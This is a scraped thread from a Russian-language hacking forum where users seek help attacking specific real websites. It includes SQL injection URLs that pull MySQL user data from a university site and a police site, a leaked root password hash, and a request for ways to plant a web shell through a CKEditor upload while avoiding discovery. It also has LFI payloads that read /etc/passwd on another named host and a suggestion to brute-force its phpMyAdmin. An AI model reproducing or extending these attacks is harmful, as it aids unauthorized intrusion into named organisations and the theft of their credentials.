ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://www.naval.iitkgp.ernet.in/me...rd),3,4,5,6,7,8,9,10,11,12+from+mysql.user--+

root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B

всё там нормально

Это я видел. Должен быть вывод....

я про 2 вариант

http://www.police.gov.bd/Police-act...user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-

Спасибо кто откликнулся.

В первом сайте интересен запрос table_name from information_schema.tables where table_name=database()/

в втором сайте интересней чтение файла. Сори а то что сразу не смог задать нормально вопрос.

Всем привет!

На странице есть ckeditor с возможностью загружать файлы на сервер.

- заливать можно всё

- имена файлов переименовывается, так что залить .htaccess не получится

- имена после заливки известны

- php, php3, phtml (возможно и другие, больше не пробовал, боюсь мою кучу говна скоро обнаружат) не выполняются, скачиваются

- shtml открывается, но так же не выполняется (судя по всему там хрен что выполняется)

Свои идеи иссякли, а останавливаться на достигнутом не хочется, так что прошу поделиться идеями, размышлениями на тему заливки рабочего шелла и т.п. вещей.

Не уверен что с html+js можно что-то придумать, может какой perl сгодится или еще что, но в этом я уже не силен.

Да кстати, хоть ckeditor версии 4.0.1, толку от этого нет, т.к. папка samples отсутствует.

И еще проверил pl, чтоб наверняка, тоже понятное дело скачивается.

Помогите раскрутить LFI

_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd

?page=file:///etc/passwd

Вроде как указал автор работает. Не очень понятно что требуется

http://lidodo.astro.ncu.edu.tw/phpMyAdmin/index.php есть phpmyadmin можно попробывать пробрутить

версия http://lidodo.astro.ncu.edu.tw/phpMy...tml/index.html